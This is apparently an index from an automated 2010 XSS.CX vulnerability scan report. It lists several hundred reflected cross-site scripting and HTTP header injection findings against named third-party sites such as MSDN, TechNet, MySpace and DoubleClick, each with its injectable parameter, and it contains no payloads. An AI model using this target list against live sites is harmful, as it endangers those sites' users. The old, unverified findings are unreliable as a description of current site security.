CWE-79, XSS, HTTP Header Injection, Capec-113, Example Report

Loading

Cross Site Scripting, HTTP Header Injection, Example Report for 12-11-2010 | CloudScan Vulnerability Crawler US Central 2

Report generated by XSS.CX at Sat Dec 11 15:13:56 CST 2010.


HTTP Header Injection, Cross Site Scripting, CWE-79, CWE-113

1. HTTP header injection

1.1. http://ad.doubleclick.net/ad/N4390.no_url_specifiedOX2495/B4882317.27 [REST URL parameter 1]

1.2. http://ad.doubleclick.net/adj/N5811.6393.MYSPACE/B5015899 [REST URL parameter 1]

2. Cross-site scripting (reflected)

2.1. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]

2.2. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]

2.3. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 4]

2.4. http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter]

2.5. http://digg.com/submit [REST URL parameter 1]

2.6. http://events.nrf.com/annual2010/public/MainHall.aspx [exp parameter]

2.7. http://events.nrf.com/annual2010/public/MainHall.aspx [name of an arbitrarily supplied request parameter]

2.8. https://googleonline.webex.com/ec0605lb/eventcenter/recording/recordAction.do [REST URL parameter 1]

2.9. https://googleonline.webex.com/ec0605lb/eventcenter/recording/recordAction.do [REST URL parameter 2]

2.10. https://googleonline.webex.com/ec0605lb/eventcenter/recording/recordAction.do [REST URL parameter 3]

2.11. https://graph.facebook.com/oauth/authorize [REST URL parameter 2]

2.12. http://mike2.openmethodology.org/wiki/Fusing_Enterprise_Search_and_Social_Bookmarking [REST URL parameter 2]

2.13. http://msdn.microsoft.com/ [name of an arbitrarily supplied request parameter]

2.14. http://msdn.microsoft.com/cc300389.aspx [name of an arbitrarily supplied request parameter]

2.15. http://msdn.microsoft.com/en-us/library(d=loband [REST URL parameter 1]

2.16. http://msdn.microsoft.com/en-us/library/aa155072.aspx [REST URL parameter 1]

2.17. http://msdn.microsoft.com/en-us/library/aa155072.aspx [REST URL parameter 2]

2.18. http://msdn.microsoft.com/en-us/library/aa155072.aspx [REST URL parameter 3]

2.19. http://msdn.microsoft.com/en-us/library/aa155073.aspx [REST URL parameter 1]

2.20. http://msdn.microsoft.com/en-us/library/aa155073.aspx [REST URL parameter 2]

2.21. http://msdn.microsoft.com/en-us/library/aa155073.aspx [REST URL parameter 3]

2.22. http://msdn.microsoft.com/en-us/library/aa187916.aspx [REST URL parameter 1]

2.23. http://msdn.microsoft.com/en-us/library/aa187916.aspx [REST URL parameter 2]

2.24. http://msdn.microsoft.com/en-us/library/aa187916.aspx [REST URL parameter 3]

2.25. http://msdn.microsoft.com/en-us/library/bb726434(office.12 [REST URL parameter 1]

2.26. http://msdn.microsoft.com/en-us/library/bb726434(office.12 [REST URL parameter 2]

2.27. http://msdn.microsoft.com/en-us/library/bb726434(office.12 [REST URL parameter 3]

2.28. http://msdn.microsoft.com/en-us/library/bb726434(office.12).aspx [REST URL parameter 1]

2.29. http://msdn.microsoft.com/en-us/library/bb726434(office.12).aspx [REST URL parameter 2]

2.30. http://msdn.microsoft.com/en-us/library/bb726434(office.12).aspx [REST URL parameter 3]

2.31. http://msdn.microsoft.com/en-us/library/bb871518.aspx [REST URL parameter 1]

2.32. http://msdn.microsoft.com/en-us/library/bb871518.aspx [REST URL parameter 2]

2.33. http://msdn.microsoft.com/en-us/library/bb871518.aspx [REST URL parameter 3]

2.34. http://msdn.microsoft.com/en-us/library/bb871519.aspx [REST URL parameter 1]

2.35. http://msdn.microsoft.com/en-us/library/bb871519.aspx [REST URL parameter 2]

2.36. http://msdn.microsoft.com/en-us/library/bb871519.aspx [REST URL parameter 3]

2.37. http://msdn.microsoft.com/en-us/library/cc295789.aspx [REST URL parameter 1]

2.38. http://msdn.microsoft.com/en-us/library/cc295789.aspx [REST URL parameter 2]

2.39. http://msdn.microsoft.com/en-us/library/cc295789.aspx [REST URL parameter 3]

2.40. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10 [REST URL parameter 1]

2.41. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10 [REST URL parameter 2]

2.42. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10 [REST URL parameter 3]

2.43. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10).aspx [REST URL parameter 1]

2.44. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10).aspx [REST URL parameter 2]

2.45. http://msdn.microsoft.com/en-us/library/dd208104(PROT.10).aspx [REST URL parameter 3]

2.46. http://msdn.microsoft.com/en-us/library/dd582937(office.11 [REST URL parameter 1]

2.47. http://msdn.microsoft.com/en-us/library/dd582937(office.11 [REST URL parameter 2]

2.48. http://msdn.microsoft.com/en-us/library/dd582937(office.11 [REST URL parameter 3]

2.49. http://msdn.microsoft.com/en-us/library/dd582937(office.11).aspx [REST URL parameter 1]

2.50. http://msdn.microsoft.com/en-us/library/dd582937(office.11).aspx [REST URL parameter 2]

2.51. http://msdn.microsoft.com/en-us/library/dd582937(office.11).aspx [REST URL parameter 3]

2.52. http://msdn.microsoft.com/en-us/library/dd582938(office.11 [REST URL parameter 1]

2.53. http://msdn.microsoft.com/en-us/library/dd582938(office.11 [REST URL parameter 2]

2.54. http://msdn.microsoft.com/en-us/library/dd582938(office.11 [REST URL parameter 3]

2.55. http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx [REST URL parameter 1]

2.56. http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx [REST URL parameter 2]

2.57. http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx [REST URL parameter 3]

2.58. http://msdn.microsoft.com/en-us/library/dd582938(v/x3doffice.11 [REST URL parameter 1]

2.59. http://msdn.microsoft.com/en-us/library/dd582938(v/x3doffice.11 [REST URL parameter 2]

2.60. http://msdn.microsoft.com/en-us/library/dd582938(v/x3doffice.11 [REST URL parameter 3]

2.61. http://msdn.microsoft.com/en-us/library/dd582938(v/x3doffice.11 [REST URL parameter 4]

2.62. http://msdn.microsoft.com/en-us/library/dd582938(v/x3doffice.11 [name of an arbitrarily supplied request parameter]

2.63. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11 [REST URL parameter 1]

2.64. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11 [REST URL parameter 2]

2.65. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11 [REST URL parameter 3]

2.66. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11).aspx [REST URL parameter 1]

2.67. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11).aspx [REST URL parameter 2]

2.68. http://msdn.microsoft.com/en-us/library/dd582938(v=office.11).aspx [REST URL parameter 3]

2.69. http://msdn.microsoft.com/en-us/library/dd582939(office.11 [REST URL parameter 1]

2.70. http://msdn.microsoft.com/en-us/library/dd582939(office.11 [REST URL parameter 2]

2.71. http://msdn.microsoft.com/en-us/library/dd582939(office.11 [REST URL parameter 3]

2.72. http://msdn.microsoft.com/en-us/library/dd582939(office.11).aspx [REST URL parameter 1]

2.73. http://msdn.microsoft.com/en-us/library/dd582939(office.11).aspx [REST URL parameter 2]

2.74. http://msdn.microsoft.com/en-us/library/dd582939(office.11).aspx [REST URL parameter 3]

2.75. http://msdn.microsoft.com/en-us/library/dd582940(office.11 [REST URL parameter 1]

2.76. http://msdn.microsoft.com/en-us/library/dd582940(office.11 [REST URL parameter 2]

2.77. http://msdn.microsoft.com/en-us/library/dd582940(office.11 [REST URL parameter 3]

2.78. http://msdn.microsoft.com/en-us/library/dd582940(office.11).aspx [REST URL parameter 1]

2.79. http://msdn.microsoft.com/en-us/library/dd582940(office.11).aspx [REST URL parameter 2]

2.80. http://msdn.microsoft.com/en-us/library/dd582940(office.11).aspx [REST URL parameter 3]

2.81. http://msdn.microsoft.com/en-us/library/default(loband).aspx [REST URL parameter 1]

2.82. http://msdn.microsoft.com/en-us/library/default(loband).aspx [REST URL parameter 2]

2.83. http://msdn.microsoft.com/en-us/library/default(loband).aspx [REST URL parameter 3]

2.84. http://msdn.microsoft.com/en-us/library/ee663300(VS.85 [REST URL parameter 1]

2.85. http://msdn.microsoft.com/en-us/library/ee663300(VS.85 [REST URL parameter 2]

2.86. http://msdn.microsoft.com/en-us/library/ee663300(VS.85 [REST URL parameter 3]

2.87. http://msdn.microsoft.com/en-us/library/ee663300(VS.85).aspx [REST URL parameter 1]

2.88. http://msdn.microsoft.com/en-us/library/ee663300(VS.85).aspx [REST URL parameter 2]

2.89. http://msdn.microsoft.com/en-us/library/ee663300(VS.85).aspx [REST URL parameter 3]

2.90. http://msdn.microsoft.com/en-us/library/ee702802.aspx [REST URL parameter 1]

2.91. http://msdn.microsoft.com/en-us/library/ee702802.aspx [REST URL parameter 2]

2.92. http://msdn.microsoft.com/en-us/library/ee702802.aspx [REST URL parameter 3]

2.93. http://msdn.microsoft.com/en-us/library/ee721044.aspx [REST URL parameter 1]

2.94. http://msdn.microsoft.com/en-us/library/ee721044.aspx [REST URL parameter 2]

2.95. http://msdn.microsoft.com/en-us/library/ee721044.aspx [REST URL parameter 3]

2.96. http://msdn.microsoft.com/en-us/library/ee725279.aspx [REST URL parameter 1]

2.97. http://msdn.microsoft.com/en-us/library/ee725279.aspx [REST URL parameter 2]

2.98. http://msdn.microsoft.com/en-us/library/ee725279.aspx [REST URL parameter 3]

2.99. http://msdn.microsoft.com/en-us/library/ff361664.aspx [REST URL parameter 1]

2.100. http://msdn.microsoft.com/en-us/library/ff361664.aspx [REST URL parameter 2]

2.101. http://msdn.microsoft.com/en-us/library/ff361664.aspx [REST URL parameter 3]

2.102. http://msdn.microsoft.com/en-us/library/ff921345.aspx [REST URL parameter 1]

2.103. http://msdn.microsoft.com/en-us/library/ff921345.aspx [REST URL parameter 2]

2.104. http://msdn.microsoft.com/en-us/library/ff921345.aspx [REST URL parameter 3]

2.105. http://msdn.microsoft.com/en-us/library/ms123401.aspx [REST URL parameter 1]

2.106. http://msdn.microsoft.com/en-us/library/ms123401.aspx [REST URL parameter 2]

2.107. http://msdn.microsoft.com/en-us/library/ms123401.aspx [REST URL parameter 3]

2.108. http://msdn.microsoft.com/en-us/library/ms376734.aspx [REST URL parameter 1]

2.109. http://msdn.microsoft.com/en-us/library/ms376734.aspx [REST URL parameter 2]

2.110. http://msdn.microsoft.com/en-us/library/ms376734.aspx [REST URL parameter 3]

2.111. http://msdn.microsoft.com/en-us/library/ms689718(VS.85 [REST URL parameter 1]

2.112. http://msdn.microsoft.com/en-us/library/ms689718(VS.85 [REST URL parameter 2]

2.113. http://msdn.microsoft.com/en-us/library/ms689718(VS.85 [REST URL parameter 3]

2.114. http://msdn.microsoft.com/en-us/library/ms689718(VS.85).aspx [REST URL parameter 1]

2.115. http://msdn.microsoft.com/en-us/library/ms689718(VS.85).aspx [REST URL parameter 2]

2.116. http://msdn.microsoft.com/en-us/library/ms689718(VS.85).aspx [REST URL parameter 3]

2.117. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85 [REST URL parameter 1]

2.118. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85 [REST URL parameter 2]

2.119. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85 [REST URL parameter 3]

2.120. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85).aspx [REST URL parameter 1]

2.121. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85).aspx [REST URL parameter 2]

2.122. http://msdn.microsoft.com/en-us/library/ms689718(v=vs.85).aspx [REST URL parameter 3]

2.123. http://msdn.microsoft.com/en-us/library/ms690384(VS.85).aspx [REST URL parameter 1]

2.124. http://msdn.microsoft.com/en-us/library/ms690384(VS.85).aspx [REST URL parameter 2]

2.125. http://msdn.microsoft.com/en-us/library/ms690384(VS.85).aspx [REST URL parameter 3]

2.126. http://msdn.microsoft.com/en-us/library/ms691105(VS.85).aspx [REST URL parameter 1]

2.127. http://msdn.microsoft.com/en-us/library/ms691105(VS.85).aspx [REST URL parameter 2]

2.128. http://msdn.microsoft.com/en-us/library/ms691105(VS.85).aspx [REST URL parameter 3]

2.129. http://msdn.microsoft.com/en-us/library/ms951681.aspx [REST URL parameter 1]

2.130. http://msdn.microsoft.com/en-us/library/ms951681.aspx [REST URL parameter 2]

2.131. http://msdn.microsoft.com/en-us/library/ms951681.aspx [REST URL parameter 3]

2.132. http://msdn.microsoft.com/en-us/ms348103.aspx [name of an arbitrarily supplied request parameter]

2.133. http://myspace.videosurf.com/video/brittany-mae-smith-surveillance-footage-1247969138 [REST URL parameter 2]

2.134. http://myspace.videosurf.com/video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256 [REST URL parameter 2]

2.135. http://myspace.videosurf.com/video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256 [name of an arbitrarily supplied request parameter]

2.136. http://myspace.videosurf.com/video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256 [vlt parameter]

2.137. http://myspace.videosurf.com/video/saved-by-the-belding-1247850355 [REST URL parameter 2]

2.138. http://myspace.videosurf.com/video/saved-by-the-belding-1247850355 [name of an arbitrarily supplied request parameter]

2.139. http://myspace.videosurf.com/video/saved-by-the-belding-1247850355 [vlt parameter]

2.140. http://myspace.videosurf.com/video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079 [REST URL parameter 2]

2.141. http://myspace.videosurf.com/video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079 [name of an arbitrarily supplied request parameter]

2.142. http://myspace.videosurf.com/video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079 [vlt parameter]

2.143. http://myspace.videosurf.com/video/the-invisibles-part-one-seaworld-english-1239815528 [REST URL parameter 2]

2.144. http://myspace.videosurf.com/video/the-invisibles-part-one-seaworld-english-1239815528 [name of an arbitrarily supplied request parameter]

2.145. http://myspace.videosurf.com/video/the-invisibles-part-one-seaworld-english-1239815528 [vlt parameter]

2.146. http://myspace.videosurf.com/videos/' [REST URL parameter 1]

2.147. http://myspace.videosurf.com/videos/' [REST URL parameter 2]

2.148. http://myspace.videosurf.com/videos/' [name of an arbitrarily supplied request parameter]

2.149. http://network.videosurf.com/beacon/people_search/myspace [REST URL parameter 1]

2.150. http://programs.lucidimagination.com/AW-WP-LS4ES.html [sc parameter]

2.151. http://programs.lucidimagination.com/AW-WP-Starting.html [sc parameter]

2.152. https://secure.shareit.com/shareit/cart.html [name of an arbitrarily supplied request parameter]

2.153. https://secure.shareit.com/shareit/product.html [name of an arbitrarily supplied request parameter]

2.154. http://technet.microsoft.com/en-us/library/aa991542.aspx [REST URL parameter 1]

2.155. http://technet.microsoft.com/en-us/library/aa991542.aspx [REST URL parameter 2]

2.156. http://technet.microsoft.com/en-us/library/aa991542.aspx [REST URL parameter 3]

2.157. http://technet.microsoft.com/en-us/library/bb625087.aspx [REST URL parameter 1]

2.158. http://technet.microsoft.com/en-us/library/bb625087.aspx [REST URL parameter 2]

2.159. http://technet.microsoft.com/en-us/library/bb625087.aspx [REST URL parameter 3]

2.160. http://technet.microsoft.com/en-us/library/bb726976.aspx [REST URL parameter 1]

2.161. http://technet.microsoft.com/en-us/library/bb726976.aspx [REST URL parameter 2]

2.162. http://technet.microsoft.com/en-us/library/bb726976.aspx [REST URL parameter 3]

2.163. http://technet.microsoft.com/en-us/library/bb727024.aspx [REST URL parameter 1]

2.164. http://technet.microsoft.com/en-us/library/bb727024.aspx [REST URL parameter 2]

2.165. http://technet.microsoft.com/en-us/library/bb727024.aspx [REST URL parameter 3]

2.166. http://technet.microsoft.com/en-us/library/bb727026.aspx [REST URL parameter 1]

2.167. http://technet.microsoft.com/en-us/library/bb727026.aspx [REST URL parameter 2]

2.168. http://technet.microsoft.com/en-us/library/bb727026.aspx [REST URL parameter 3]

2.169. http://technet.microsoft.com/en-us/library/bb727028.aspx [REST URL parameter 1]

2.170. http://technet.microsoft.com/en-us/library/bb727028.aspx [REST URL parameter 2]

2.171. http://technet.microsoft.com/en-us/library/bb727028.aspx [REST URL parameter 3]

2.172. http://technet.microsoft.com/en-us/library/bb727030.aspx [REST URL parameter 1]

2.173. http://technet.microsoft.com/en-us/library/bb727030.aspx [REST URL parameter 2]

2.174. http://technet.microsoft.com/en-us/library/bb727030.aspx [REST URL parameter 3]

2.175. http://technet.microsoft.com/en-us/library/bb727032.aspx [REST URL parameter 1]

2.176. http://technet.microsoft.com/en-us/library/bb727032.aspx [REST URL parameter 2]

2.177. http://technet.microsoft.com/en-us/library/bb727032.aspx [REST URL parameter 3]

2.178. http://technet.microsoft.com/en-us/library/bb727034.aspx [REST URL parameter 1]

2.179. http://technet.microsoft.com/en-us/library/bb727034.aspx [REST URL parameter 2]

2.180. http://technet.microsoft.com/en-us/library/bb727034.aspx [REST URL parameter 3]

2.181. http://technet.microsoft.com/en-us/library/bb727042.aspx [REST URL parameter 1]

2.182. http://technet.microsoft.com/en-us/library/bb727042.aspx [REST URL parameter 2]

2.183. http://technet.microsoft.com/en-us/library/bb727042.aspx [REST URL parameter 3]

2.184. http://technet.microsoft.com/en-us/library/bb727044.aspx [REST URL parameter 1]

2.185. http://technet.microsoft.com/en-us/library/bb727044.aspx [REST URL parameter 2]

2.186. http://technet.microsoft.com/en-us/library/bb727044.aspx [REST URL parameter 3]

2.187. http://technet.microsoft.com/en-us/library/bb727046.aspx [REST URL parameter 1]

2.188. http://technet.microsoft.com/en-us/library/bb727046.aspx [REST URL parameter 2]

2.189. http://technet.microsoft.com/en-us/library/bb727046.aspx [REST URL parameter 3]

2.190. http://technet.microsoft.com/en-us/library/bb727048.aspx [REST URL parameter 1]

2.191. http://technet.microsoft.com/en-us/library/bb727048.aspx [REST URL parameter 2]

2.192. http://technet.microsoft.com/en-us/library/bb727050.aspx [REST URL parameter 1]

2.193. http://technet.microsoft.com/en-us/library/bb727052.aspx [REST URL parameter 1]

2.194. http://technet.microsoft.com/en-us/library/bb727054.aspx [REST URL parameter 1]

2.195. http://technet.microsoft.com/en-us/library/bb727063.aspx [REST URL parameter 1]

2.196. http://technet.microsoft.com/en-us/library/bb727063.aspx [REST URL parameter 2]

2.197. http://technet.microsoft.com/en-us/library/bb727063.aspx [REST URL parameter 3]

2.198. http://technet.microsoft.com/en-us/library/bb727064.aspx [REST URL parameter 1]

2.199. http://technet.microsoft.com/en-us/library/bb727064.aspx [REST URL parameter 2]

2.200. http://technet.microsoft.com/en-us/library/bb727064.aspx [REST URL parameter 3]

2.201. http://technet.microsoft.com/en-us/library/bb727067.aspx [REST URL parameter 1]

2.202. http://technet.microsoft.com/en-us/library/bb727067.aspx [REST URL parameter 2]

2.203. http://technet.microsoft.com/en-us/library/bb727067.aspx [REST URL parameter 3]

2.204. http://technet.microsoft.com/en-us/library/bb727069.aspx [REST URL parameter 1]

2.205. http://technet.microsoft.com/en-us/library/bb727070.aspx [REST URL parameter 1]

2.206. http://technet.microsoft.com/en-us/library/bb727070.aspx [REST URL parameter 2]

2.207. http://technet.microsoft.com/en-us/library/bb727070.aspx [REST URL parameter 3]

2.208. http://technet.microsoft.com/en-us/library/bb727085.aspx [REST URL parameter 1]

2.209. http://technet.microsoft.com/en-us/library/bb727085.aspx [REST URL parameter 2]

2.210. http://technet.microsoft.com/en-us/library/bb727085.aspx [REST URL parameter 3]

2.211. http://technet.microsoft.com/en-us/library/bb727091.aspx [REST URL parameter 1]

2.212. http://technet.microsoft.com/en-us/library/bb727091.aspx [REST URL parameter 2]

2.213. http://technet.microsoft.com/en-us/library/bb727091.aspx [REST URL parameter 3]

2.214. http://technet.microsoft.com/en-us/library/bb727099.aspx [REST URL parameter 1]

2.215. http://technet.microsoft.com/en-us/library/bb727099.aspx [REST URL parameter 2]

2.216. http://technet.microsoft.com/en-us/library/bb727099.aspx [REST URL parameter 3]

2.217. http://technet.microsoft.com/en-us/library/bb727159.aspx [REST URL parameter 1]

2.218. http://technet.microsoft.com/en-us/library/bb727159.aspx [REST URL parameter 2]

2.219. http://technet.microsoft.com/en-us/library/bb727159.aspx [REST URL parameter 3]

2.220. http://technet.microsoft.com/en-us/library/bb727169.aspx [REST URL parameter 1]

2.221. http://technet.microsoft.com/en-us/library/bb727169.aspx [REST URL parameter 2]

2.222. http://technet.microsoft.com/en-us/library/bb727169.aspx [REST URL parameter 3]

2.223. http://technet.microsoft.com/en-us/library/bb742437.aspx [REST URL parameter 1]

2.224. http://technet.microsoft.com/en-us/library/bb742437.aspx [REST URL parameter 2]

2.225. http://technet.microsoft.com/en-us/library/bb742437.aspx [REST URL parameter 3]

2.226. http://technet.microsoft.com/en-us/library/bb742438.aspx [REST URL parameter 1]

2.227. http://technet.microsoft.com/en-us/library/bb742438.aspx [REST URL parameter 2]

2.228. http://technet.microsoft.com/en-us/library/bb742438.aspx [REST URL parameter 3]

2.229. http://technet.microsoft.com/en-us/library/bb742457.aspx [REST URL parameter 1]

2.230. http://technet.microsoft.com/en-us/library/bb742457.aspx [REST URL parameter 2]

2.231. http://technet.microsoft.com/en-us/library/bb742457.aspx [REST URL parameter 3]

2.232. http://technet.microsoft.com/en-us/library/bb742548.aspx [REST URL parameter 1]

2.233. http://technet.microsoft.com/en-us/library/bb742548.aspx [REST URL parameter 2]

2.234. http://technet.microsoft.com/en-us/library/bb742548.aspx [REST URL parameter 3]

2.235. http://technet.microsoft.com/en-us/library/bb742578.aspx [REST URL parameter 1]

2.236. http://technet.microsoft.com/en-us/library/bb742578.aspx [REST URL parameter 2]

2.237. http://technet.microsoft.com/en-us/library/bb742578.aspx [REST URL parameter 3]

2.238. http://technet.microsoft.com/en-us/library/bb742583.aspx [REST URL parameter 1]

2.239. http://technet.microsoft.com/en-us/library/bb742583.aspx [REST URL parameter 2]

2.240. http://technet.microsoft.com/en-us/library/bb742583.aspx [REST URL parameter 3]

2.241. http://technet.microsoft.com/en-us/library/default(loband).aspx [REST URL parameter 1]

2.242. http://technet.microsoft.com/en-us/library/default(loband).aspx [REST URL parameter 2]

2.243. http://technet.microsoft.com/en-us/library/default(loband).aspx [REST URL parameter 3]

2.244. http://thedailyreviewer.com/tags/alphabetical/a [REST URL parameter 3]

2.245. http://thedailyreviewer.com/tags/alphabetical/b [REST URL parameter 3]

2.246. http://thedailyreviewer.com/tags/alphabetical/c [REST URL parameter 3]

2.247. http://thedailyreviewer.com/tags/alphabetical/d [REST URL parameter 3]

2.248. http://thedailyreviewer.com/tags/alphabetical/e [REST URL parameter 3]

2.249. http://thedailyreviewer.com/tags/alphabetical/f [REST URL parameter 3]

2.250. http://thedailyreviewer.com/tags/alphabetical/g [REST URL parameter 3]

2.251. http://thedailyreviewer.com/tags/alphabetical/h [REST URL parameter 3]

2.252. http://thedailyreviewer.com/tags/alphabetical/i [REST URL parameter 3]

2.253. http://thedailyreviewer.com/tags/alphabetical/j [REST URL parameter 3]

2.254. http://thedailyreviewer.com/tags/alphabetical/k [REST URL parameter 3]

2.255. http://thedailyreviewer.com/tags/alphabetical/l [REST URL parameter 3]

2.256. http://thedailyreviewer.com/tags/alphabetical/m [REST URL parameter 3]

2.257. http://thedailyreviewer.com/tags/alphabetical/n [REST URL parameter 3]

2.258. http://thedailyreviewer.com/tags/alphabetical/o [REST URL parameter 3]

2.259. http://thedailyreviewer.com/tags/alphabetical/p [REST URL parameter 3]

2.260. http://thedailyreviewer.com/tags/alphabetical/q [REST URL parameter 3]

2.261. http://thedailyreviewer.com/tags/alphabetical/r [REST URL parameter 3]

2.262. http://thedailyreviewer.com/tags/alphabetical/s [REST URL parameter 3]

2.263. http://thedailyreviewer.com/tags/alphabetical/t [REST URL parameter 3]

2.264. http://thedailyreviewer.com/tags/alphabetical/u [REST URL parameter 3]

2.265. http://thedailyreviewer.com/tags/alphabetical/v [REST URL parameter 3]

2.266. http://thedailyreviewer.com/tags/alphabetical/w [REST URL parameter 3]

2.267. http://thedailyreviewer.com/tags/alphabetical/x [REST URL parameter 3]

2.268. http://thedailyreviewer.com/tags/alphabetical/y [REST URL parameter 3]

2.269. http://thedailyreviewer.com/tags/alphabetical/z [REST URL parameter 3]

2.270. http://thedailyreviewer.com/top/baseball [REST URL parameter 2]

2.271. http://thedailyreviewer.com/top/baseball [REST URL parameter 2]

2.272. http://thedailyreviewer.com/top/breaking-news [REST URL parameter 2]

2.273. http://thedailyreviewer.com/top/breaking-news [REST URL parameter 2]

2.274. http://thedailyreviewer.com/top/business [REST URL parameter 2]

2.275. http://thedailyreviewer.com/top/business [REST URL parameter 2]

2.276. http://thedailyreviewer.com/top/celebrities [REST URL parameter 2]

2.277. http://thedailyreviewer.com/top/celebrities [REST URL parameter 2]

2.278. http://thedailyreviewer.com/top/economy [REST URL parameter 2]

2.279. http://thedailyreviewer.com/top/economy [REST URL parameter 2]

2.280. http://thedailyreviewer.com/top/entertainment [REST URL parameter 2]

2.281. http://thedailyreviewer.com/top/entertainment [REST URL parameter 2]

2.282. http://thedailyreviewer.com/top/finance [REST URL parameter 2]

2.283. http://thedailyreviewer.com/top/finance [REST URL parameter 2]

2.284. http://thedailyreviewer.com/top/gadgets [REST URL parameter 2]

2.285. http://thedailyreviewer.com/top/gadgets [REST URL parameter 2]

2.286. http://thedailyreviewer.com/top/health [REST URL parameter 2]

2.287. http://thedailyreviewer.com/top/health [REST URL parameter 2]

2.288. http://thedailyreviewer.com/top/movies [REST URL parameter 2]

2.289. http://thedailyreviewer.com/top/movies [REST URL parameter 2]

2.290. http://thedailyreviewer.com/top/music [REST URL parameter 2]

2.291. http://thedailyreviewer.com/top/music [REST URL parameter 2]

2.292. http://thedailyreviewer.com/top/nba-basketball [REST URL parameter 2]

2.293. http://thedailyreviewer.com/top/nba-basketball [REST URL parameter 2]

2.294. http://thedailyreviewer.com/top/nfl-football [REST URL parameter 2]

2.295. http://thedailyreviewer.com/top/nfl-football [REST URL parameter 2]

2.296. http://thedailyreviewer.com/top/politics [REST URL parameter 2]

2.297. http://thedailyreviewer.com/top/politics [REST URL parameter 2]

2.298. http://thedailyreviewer.com/top/real-estate [REST URL parameter 2]

2.299. http://thedailyreviewer.com/top/real-estate [REST URL parameter 2]

2.300. http://thedailyreviewer.com/top/regional-news [REST URL parameter 2]

2.301. http://thedailyreviewer.com/top/regional-news [REST URL parameter 2]

2.302. http://thedailyreviewer.com/top/science [REST URL parameter 2]

2.303. http://thedailyreviewer.com/top/science [REST URL parameter 2]

2.304. http://thedailyreviewer.com/top/soccer [REST URL parameter 2]

2.305. http://thedailyreviewer.com/top/soccer [REST URL parameter 2]

2.306. http://thedailyreviewer.com/top/sports [REST URL parameter 2]

2.307. http://thedailyreviewer.com/top/sports [REST URL parameter 2]

2.308. http://thedailyreviewer.com/top/stocks [REST URL parameter 2]

2.309. http://thedailyreviewer.com/top/stocks [REST URL parameter 2]

2.310. http://thedailyreviewer.com/top/technology [REST URL parameter 2]

2.311. http://thedailyreviewer.com/top/technology [REST URL parameter 2]

2.312. http://thedailyreviewer.com/top/tv [REST URL parameter 2]

2.313. http://thedailyreviewer.com/top/tv [REST URL parameter 2]

2.314. http://thedailyreviewer.com/top/world-news [REST URL parameter 2]

2.315. http://thedailyreviewer.com/top/world-news [REST URL parameter 2]

2.316. http://video.webcasts.com/events/pmny001/viewer/index.jsp [eventid parameter]

2.317. http://www.alumni.uga.edu/alumni/phpsearch/search.php [name of an arbitrarily supplied request parameter]

2.318. http://www.ancestry.com/search/rectype/default.aspx [rt parameter]

2.319. http://www.casey.vic.gov.au/search/search.asp [name of an arbitrarily supplied request parameter]

2.320. http://www.casey.vic.gov.au/search/search.asp [name of an arbitrarily supplied request parameter]

2.321. http://www.coveo.com/en/search [name of an arbitrarily supplied request parameter]

2.322. http://www.coveo.com/search [name of an arbitrarily supplied request parameter]

2.323. http://www.myspace.com/search/people [name of an arbitrarily supplied request parameter]

2.324. http://www.orange.md/ [name of an arbitrarily supplied request parameter]

2.325. http://www.recover.ie/search.php [name of an arbitrarily supplied request parameter]

2.326. http://www.uniquecarsandparts.com.au/search.php [name of an arbitrarily supplied request parameter]

2.327. http://www.usmd.edu/search/index.php [REST URL parameter 1]

2.328. http://www.usmd.edu/search/index.php [REST URL parameter 1]

2.329. http://www.usmd.edu/search/index.php [REST URL parameter 1]

2.330. http://www.usmd.edu/search/index.php [REST URL parameter 2]

2.331. http://www.usmd.edu/search/index.php [REST URL parameter 2]

2.332. http://api.myspace.com/-/opensearch/extensions/1.0/ [Referer HTTP header]

2.333. http://duckduckgo.com/x22 [Referer HTTP header]

2.334. https://secure.shareit.com/shareit/cart.html [Referer HTTP header]

2.335. https://secure.shareit.com/shareit/cart.html [Referer HTTP header]

2.336. http://www.mobythreads.com/Search-Engine-ftopict7472.html/x26amp [Referer HTTP header]

2.337. http://www.mobythreads.com/component-add-remove-ftopict7049.html/x26amp [Referer HTTP header]

2.338. http://www.t-mobile.com/shop/Phones/cell-phone-detail.aspx [User-Agent HTTP header]

2.339. http://myspace.com/ [name of an arbitrarily supplied request parameter]

2.340. http://searchservice.myspace.com/index.cfm [d parameter]

2.341. http://searchservice.myspace.com/index.cfm [fuseaction parameter]

2.342. http://searchservice.myspace.com/index.cfm [g parameter]

2.343. http://searchservice.myspace.com/index.cfm [loc parameter]

2.344. http://searchservice.myspace.com/index.cfm [maxAge parameter]

2.345. http://searchservice.myspace.com/index.cfm [minAge parameter]

2.346. http://searchservice.myspace.com/index.cfm [name of an arbitrarily supplied request parameter]

2.347. http://searchservice.myspace.com/index.cfm [npic parameter]

2.348. http://searchservice.myspace.com/index.cfm [pg parameter]

2.349. http://searchservice.myspace.com/index.cfm [qry parameter]

2.350. http://searchservice.myspace.com/index.cfm [type parameter]

2.351. http://seg.sharethis.com/getSegment.php [__stid cookie]



1. HTTP header injection  next
There are 2 instances of this issue:

Issue background

